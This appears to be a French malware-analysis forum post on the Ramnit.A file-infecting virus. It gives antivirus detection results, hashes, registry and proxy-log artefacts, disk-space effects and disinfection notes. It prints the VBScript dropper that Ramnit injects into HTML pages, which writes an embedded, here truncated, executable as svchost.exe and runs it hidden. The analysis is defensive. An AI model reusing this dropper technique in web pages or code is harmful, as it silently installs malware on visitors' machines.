Ramnit.A (première version) est un virus au sens stricte du terme, c'est à dire qu'il infecte les fichiers exécutables.
Ramnit.A infecte les fichiers .EXE / .DLL et .HTML
Ce dernier semble moins virulant que son confrère : Virut / Virtob / Vitro.
La détection de la variante que je possède est excellente, voici les noms des détections des divers antivirus :
File name: uploaded_data
Submission date: 2010-08-03 10:12:24 (UTC)
Current status: finished
Result: 30 /42 (71.4%)
VT Community
Compact Print results
Antivirus Version Last Update Result
AhnLab-V3 2010.08.03.00 2010.08.03 Virus/Win32.Ramnit
AntiVir 8.2.4.32 2010.08.03 W32/Infector.Gen2
Antiy-AVL 2.0.3.7 2010.08.02 -
Authentium 5.2.0.5 2010.08.03 -
Avast 4.8.1351.0 2010.08.02 Win32:Quolko
Avast5 5.0.332.0 2010.08.02 Win32:Quolko
AVG 9.0.0.851 2010.08.03 Win32/Zbot.A
BitDefender 7.2 2010.08.03 Dropped:Backdoor.Bot.125603
CAT-QuickHeal 11.00 2010.08.03 W32.Ramnit.A
ClamAV 0.96.0.3-git 2010.08.03 -
Comodo 5628 2010.08.03 TrojWare.Win32.Trojan.Agent.~UL
DrWeb 5.0.2.03300 2010.08.03 Win32.Rmnet
Emsisoft 5.0.0.34 2010.07.30 Riskware.AdWare.Win32.Virtumonde!IK
eSafe 7.0.17.0 2010.08.02 -
eTrust-Vet 36.1.7757 2010.08.02 Win32/Ramnit.A
F-Prot 4.6.1.107 2010.08.03 W32/Ircnite.A.gen!Eldorado
F-Secure 9.0.15370.0 2010.08.03 Dropped:Backdoor.Bot.125603
Fortinet 4.1.143.0 2010.08.02 -
GData 21 2010.08.03 Dropped:Backdoor.Bot.125603
Ikarus T3.1.1.84.0 2010.08.03 not-a-virus:AdWare.Win32.Virtumonde
Jiangmin 13.0.900 2010.08.03 -
Kaspersky 7.0.0.125 2010.08.03 Type_Win32
McAfee 5.400.0.1158 2010.08.03 W32/Ramnit.a
McAfee-GW-Edition 2010.1 2010.08.02 Heuristic.LooksLike.Win32.SuspiciousPE.J
Microsoft 1.6004 2010.08.03 Virus:Win32/Ramnit.A
NOD32 5335 2010.08.02 Win32/Ramnit.A
Norman 6.05.11 2010.08.02 W32/Ramnit.A
nProtect 2010-08-02.02 2010.08.02 Dropped:Backdoor.Bot.125603
Panda 10.0.2.7 2010.08.02 W32/Cosmu.A
PCTools 7.0.3.5 2010.08.03 -
Prevx 3.0 2010.08.03 -
Rising 22.59.01.03 2010.08.03 Win32.Ramnit.a
Sophos 4.56.0 2010.08.03 W32/Patched-I
Sunbelt 6677 2010.08.03 Trojan.Win32.Generic!BT
SUPERAntiSpyware 4.40.0.1006 2010.08.03 -
Symantec 20101.1.1.7 2010.08.03 -
TheHacker 6.5.2.1.329 2010.08.03 -
TrendMicro 9.120.0.1004 2010.08.03 PE_RAMNIT.A
TrendMicro-HouseCall 9.120.0.1004 2010.08.03 PE_RAMNIT.A
VBA32 3.12.12.7 2010.08.02 Backdoor.IRCNite.pl
ViRobot 2010.8.3.3968 2010.08.03 -
VirusBuster 5.0.27.0 2010.08.02 Win32.Ramnit.Gen
Additional informationShow all
MD5 : 834fee3ade17da25749e190551321d92
SHA1 : 4f7378a963b849ba215f38ec15e76a0f9d631711
SHA256: ded3dae323a909c4752fa135de72cdc00ce0da3d1a5fd715fe536105a4da8cac
Le code ajouté aux fichiers HTML :
Code : Tout sélectionner
DropFileName = "svchost.exe"
WriteData = "4D5A90000300000004000000FFFF0000B8000000000000004000000000000000000000000000000000000000000000000000000000000000000000001[removed]"
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
//--></SCRIPT>
La détection d'une page WEB infectée :
File name: Accueil malekal_com.htm
Submission date: 2010-11-07 18:32:48 (UTC)
Current status: queued queued analysing finished
Result: 30/ 43 (69.8%)
Compact Print results
Antivirus Version Last Update Result
AhnLab-V3 2010.11.06.01 2010.11.06 -
AntiVir 7.10.13.164 2010.11.07 HTML/Rce.Gen
Antiy-AVL 2.0.3.7 2010.11.07 -
Authentium 5.2.0.5 2010.11.07 VBS/Inor.DZ
Avast 4.8.1351.0 2010.11.07 VBS:ExeDropper-gen
Avast5 5.0.594.0 2010.11.07 VBS:ExeDropper-gen
AVG 9.0.0.851 2010.11.07 VBS/Generic
BitDefender 7.2 2010.11.07 Win32.Ramnit.C
CAT-QuickHeal 11.00 2010.11.04 -
ClamAV 0.96.2.0-git 2010.11.06 PUA.HTML.Infected.WebPage-2
Comodo 6643 2010.11.07 -
DrWeb 5.0.2.03300 2010.11.07 Trojan.Inor
Emsisoft 5.0.0.50 2010.11.07 HTML.Rce!IK
eSafe 7.0.17.0 2010.11.07 VBS.Redlof.i
eTrust-Vet 36.1.7958 2010.11.05 HTML/Ramnit!generic
F-Prot 4.6.2.117 2010.11.07 VBS/Inor.DZ
F-Secure 9.0.16160.0 2010.11.07 Win32.Ramnit.C
Fortinet 4.2.249.0 2010.11.07 VBS/Dropper.DL!tr
GData 21 2010.11.07 Win32.Ramnit.C
Ikarus T3.1.1.90.0 2010.11.07 HTML.Rce
Jiangmin 13.0.900 2010.11.07 -
K7AntiVirus 9.67.2903 2010.11.03 Trojan
Kaspersky 7.0.0.125 2010.11.07 Trojan-Dropper.VBS.Exe2Vbs.b
McAfee 5.400.0.1158 2010.11.07 W32/Ramnit.a!htm
McAfee-GW-Edition 2010.1C 2010.11.07 -
Microsoft 1.6301 2010.11.07 Virus:VBS/Ramnit.B
NOD32 5598 2010.11.07 Win32/Ramnit.A
Norman 6.06.10 2010.11.07 HTML/Ramnit.A
nProtect 2010-11-07.01 2010.11.07 -
Panda 10.0.2.7 2010.11.07 W32/Cosmu.A
PCTools 7.0.3.5 2010.11.07 Malware.Ramnit
Prevx 3.0 2010.11.07 -
Rising 22.72.04.00 2010.11.06 Dropper.Script.VBS.Fednu.a
Sophos 4.59.0 2010.11.07 VBS/Inor-AA
Sunbelt 7243 2010.11.07 Trojan.VBS.Ramnit (v)
SUPERAntiSpyware 4.40.0.1006 2010.11.07 -
Symantec 20101.2.0.161 2010.11.07 W32.Ramnit!html
TheHacker 6.7.0.1.079 2010.11.07 -
TrendMicro 9.120.0.1004 2010.11.07 HTML_RAMNIT.AL
TrendMicro-HouseCall 9.120.0.1004 2010.11.07 HTML_RAMNIT.AL
VBA32 3.12.14.1 2010.11.05 -
ViRobot 2010.10.4.4074 2010.11.07 -
VirusBuster 12.72.1.1 2010.11.07 -
Additional informationShow all
MD5 : 1f416d12ee00b2500e10a2eaa75a8475
SHA1 : 2984fbacb71d28eb921036753acd85bbd1741b00
SHA256: 68e232daf8c6f9ccf932eb3d840dacaa6a2410c614ecaaa9da8d82e11bf8db3c
Les lignes suivantes ont été ajoutés sur HijackThis :
Le malware lance une instance d'Internet Explorer en backgroundR1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyServer = http=127.0.0.1:8888;https=127.0.0.1:8888;
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName = Liens
F2 - REG:system.ini: UserInit=c:\windows\system32\userinit.exe,,c:\program files\microsoft\desktoplayer.exe

et lance des requêtes sur Google :
Code : Tout sélectionner
1289153890.751 375 192.168.1.92 TCP_MISS/200 478 GET http://www.google-analytics.com/__utm.gif?utmwv=4.8.6&utmn=1517515671&utmhn=ads.clicksor.com&utmcs=utf-8&utmsr=1096x838&utmsc=16-bit&utmul=en-us&utmje=1&utmfl=10.0%20r22&utmhid=862729793&utmr=http%3A%2F%2Fwww.trendsone.com%2F&utmp=%2FnewServing%2FsearchTrack.php%3Fnid%3D1037%26random%3D26074&utmac=UA-453142-35&utmcc=__utma%3D251001561.2006186915.1289136613.1289148018.1289153318.6%3B%2B__utmz%3D251001561.1289153318.6.6.utmcsr%3Dtrendsone.com%7Cutmccn%3D(referral)%7Cutmcmd%3Dreferral%7Cutmcct%3D%2F%3B&utmu=DB - DIRECT/74.125.43.139 image/gif
1289153938.388 272 192.168.1.92 TCP_MISS/200 478 GET http://www.google-analytics.com/__utm.gif?utmwv=4.8.6&utmn=900480859&utmhn=tu.tv&utmcs=iso-8859-1&utmsr=1096x838&utmsc=16-bit&utmul=en-us&utmje=1&utmfl=10.0%20r22&utmdt=Tu.tv%20-%20Tus%20videos%20en%20internet&utmhid=988635622&utmr=-&utmp=%2F&utmac=UA-642705-30&utmcc=__utma%3D111564033.670189319.1289144342.1289144342.1289153366.2%3B%2B__utmz%3D111564033.1289144342.1.1.utmcsr%3D(direct)%7Cutmccn%3D(direct)%7Cutmcmd%3D(none)%3B&utmu=q - DIRECT/74.125.43.139 image/gif
En deux minutes, la machine infectée a perdu 150 Mo d'espace disque.
Et bien plus par la suite.



Dr Web CureIT (pas essayé avec Kaspersky) semble être capable de nettoyer les fichiers infectés.


fichier infecté par Ramnit.A
fichier désinfecté :malekalmorte@MaK-tux:/tmp$ ls -l mbr_Ramnit.exe
-rw-r--r-- 1 malekalmorte malekalmorte 124416 7 nov. 12:57 mbr_Ramnit.exe
C'est bien la taille origaine de mbr.exe et surtout le fichier n'est pas corrompu est utilisable.C:\Documents and Settings\Mak>dir Bureau\mbr_Ramnit.exe
Le volume dans le lecteur C n'a pas de nom.
Le numéro de série du volume est 4063-B68D
Répertoire de C:\Documents and Settings\Mak\Bureau
07/11/2010 12:57 77 312 mbr_Ramnit.exe
1 fichier(s) 77 312 octets
0 Rép(s) 5 289 340 928 octets libres
On voit donc que la taille de l'exe infecté a doublé, ce qui explique la perte d'espace disque.
Désinfection
Se reporter à cette page : https://www.malekal.com/2011/10/12/ramn ... rai-virus/